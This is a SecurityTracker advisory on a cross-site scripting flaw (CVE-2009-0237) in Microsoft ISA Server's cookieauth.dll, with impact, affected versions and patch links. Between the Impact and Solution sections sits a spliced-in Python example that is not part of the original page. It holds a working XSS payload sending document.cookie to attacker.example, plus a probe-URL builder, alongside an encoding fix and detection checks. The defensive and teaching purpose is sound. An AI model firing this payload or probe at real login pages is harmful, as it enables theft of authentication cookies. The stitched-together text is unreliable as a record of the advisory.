SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Security)  >   Microsoft Internet Security and Acceleration Server Vendors:   Microsoft
Microsoft ISA Server Input Validation Flaw in 'cookieauth.dll' Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1022046
SecurityTracker URL:  http://securitytracker.com/id/1022046
CVE Reference:   CVE-2009-0237   (Links to External Site)
Date:  Apr 14 2009
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2004 SP3, 2006 SP1; and prior service packs
Description:   A vulnerability was reported in Microsoft ISA Server and Microsoft Forefront Threat Management Gateway. A remote user can conduct cross-site scripting attacks.

The HTML forms authentication component (cookieauth.dll) does not properly encode user-supplied input before echoing it back in the page it returns. A remote user can therefore cause arbitrary script code to be executed by the target user's browser. The code will originate from the site running the Microsoft Internet Security and Acceleration Server software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Microsoft Internet Security and Acceleration Server 2000 SP2 is not affected.

The New York State Chief Information Officer / Office for Technology reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Microsoft Internet Security and Acceleration Server software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
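The flaw class described above, as an added example that is not Microsoft's cookieauth.dll code and not taken from the advisory: a forms-authentication login page that reflects a caller-controlled value into its HTML, first without output encoding and then with it, plus the response checks a tester would run against both. The parameter name `returnurl`, the form action path `/cookieauth.dll` as used here, the host name and the payload are assumptions constructed for illustration.

```python
# Added example (not Microsoft's cookieauth.dll code): the reflected-XSS flaw class
# described in this alert, shown as a forms-authentication login page that echoes a
# caller-controlled value back into its HTML. Assumptions for illustration: the
# parameter name `returnurl`, the form action path, and the constructed payload.
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Constructed attacker input: the leading quote and '>' close the hidden field's
# value attribute so the rest is parsed as a new <script> element.
PAYLOAD = (
    '"><script>new Image().src="http://attacker.example/?c="'
    '+document.cookie</script>'
)

FORM_ACTION = "/cookieauth.dll"  # assumed action path, for illustration only


def render_login_vulnerable(return_url: str) -> str:
    """Echo the return URL into the page with no output encoding (the flaw class)."""
    return (
        f'<form method="POST" action="{FORM_ACTION}">'
        f'<input type="hidden" name="returnurl" value="{return_url}">'
        '<input name="username"><input type="password" name="password">'
        '<input type="submit" value="Log On"></form>'
    )


def render_login_fixed(return_url: str) -> str:
    """Same page with HTML-attribute encoding applied before the value is reflected.

    quote=True matters here: the value sits inside a double-quoted attribute, so
    '"' must become &quot; or the attacker can still break out of the attribute.
    """
    safe = html.escape(return_url, quote=True)
    return (
        f'<form method="POST" action="{FORM_ACTION}">'
        f'<input type="hidden" name="returnurl" value="{safe}">'
        '<input name="username"><input type="password" name="password">'
        '<input type="submit" value="Log On"></form>'
    )


def probe_url(base: str, param: str, canary: str) -> str:
    """Build the request a tester would send to check whether `param` is reflected."""
    return f"{base}?{urlencode({param: canary})}"


def reflects_unescaped(body: str, canary: str) -> bool:
    """Cheap response check: the canary came back byte-for-byte, metacharacters intact."""
    return canary in body


class _PageModel(HTMLParser):
    """Parse the response the way a browser would, recording hidden-field values
    and whether any <script> element appeared. HTMLParser decodes character
    references in attribute values, so an encoded value round-trips unchanged."""

    def __init__(self) -> None:
        super().__init__()
        self.hidden_values: list[str] = []
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.hidden_values.append(a.get("value") or "")
        elif tag == "script":
            self.script_tags += 1


def hidden_values(body: str) -> list[str]:
    """Values of hidden inputs as the browser would submit them."""
    p = _PageModel()
    p.feed(body)
    p.close()
    return p.hidden_values


def contains_script_tag(body: str) -> bool:
    """True if the reflected input produced an executable <script> element."""
    p = _PageModel()
    p.feed(body)
    p.close()
    return p.script_tags > 0


if __name__ == "__main__":
    print("probe:", probe_url("https://owa.example" + FORM_ACTION, "returnurl", PAYLOAD))
    for name, render in (("vulnerable", render_login_vulnerable),
                         ("fixed", render_login_fixed)):
        body = render(PAYLOAD)
        print(f"{name:10s} raw reflection: {reflects_unescaped(body, PAYLOAD)} "
              f"script tag: {contains_script_tag(body)} "
              f"hidden field: {hidden_values(body)!r}")
```

The substring check is what a quick scan does; the parser-based check is the one that matters, because it shows the encoded page still carries the original return URL in the hidden field while no script element is created. The payload models the cookie-disclosure impact listed above; whether a particular cookie is readable through `document.cookie` depends on whether it was set with the HttpOnly flag.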
Solution:   The vendor has issued the following fixes:

Microsoft Forefront Threat Management Gateway, Medium Business Edition:

http://www.microsoft.com/downloads/details.aspx?familyid=6abf9fb4-42d0-4c67-935f-8dc67850148b

Microsoft Internet Security and Acceleration Server 2004 Standard Edition Service Pack 3:

http://www.microsoft.com/downloads/details.aspx?familyid=adf623fa-2d74-4f2a-9835-4b8debdb0e1b

Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition Service Pack 3:

http://www.microsoft.com/downloads/details.aspx?familyid=d1d55ab6-3de5-4811-9693-8d43f49f5fe8

Microsoft Internet Security and Acceleration Server 2006:

http://www.microsoft.com/downloads/details.aspx?familyid=eda30bcc-0582-4f60-a4c5-ea5000b7c770

Microsoft Internet Security and Acceleration Server 2006 Supportability Update:

http://www.microsoft.com/downloads/details.aspx?familyid=eda30bcc-0582-4f60-a4c5-ea5000b7c770

Microsoft Internet Security and Acceleration Server 2006 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?familyid=eda30bcc-0582-4f60-a4c5-ea5000b7c770

A restart is required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms09-016.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms09-016.mspx (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (2000), Windows (2003), Windows (2008)

Message History:   None.


Copyright 2021, SecurityGlobal.net LLC